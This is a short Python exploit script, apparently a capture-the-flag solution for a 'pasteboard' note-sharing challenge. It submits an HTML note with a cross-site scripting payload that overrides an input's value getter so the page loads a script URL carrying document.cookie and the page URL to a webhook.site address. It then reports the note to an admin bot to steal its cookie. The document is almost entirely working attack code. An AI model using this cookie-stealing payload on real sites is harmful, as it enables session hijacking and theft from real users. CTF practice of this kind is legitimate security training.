import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Use Object.defineProperty to make path.value a getter that returns dynamic content!
payload = f'''<form id="errorReporter"><input name="path" id="pathInput"></form>
<script>
Object.defineProperty(document.getElementById('pathInput'), 'value', {{
  get: function() {{
    return '//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/steal.js?cookie=' + encodeURIComponent(document.cookie) + '&url=' + encodeURIComponent(location.href);
  }}
}});
</script>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] Using getter to make path.value dynamic!")
print("[*] When app.js reads path.value, it will execute our getter")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Getter Exploit", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {{note_url}}")
    print()
    print("[*] Manual test URL above ^")
    print()
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported to bot!")
        print()
        print("[*] Should see GET to /steal.js?cookie=<FLAG>&url=...")
        print("[*] Check: https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
else:
    print(f"[-] Failed: {{resp.status_code}}")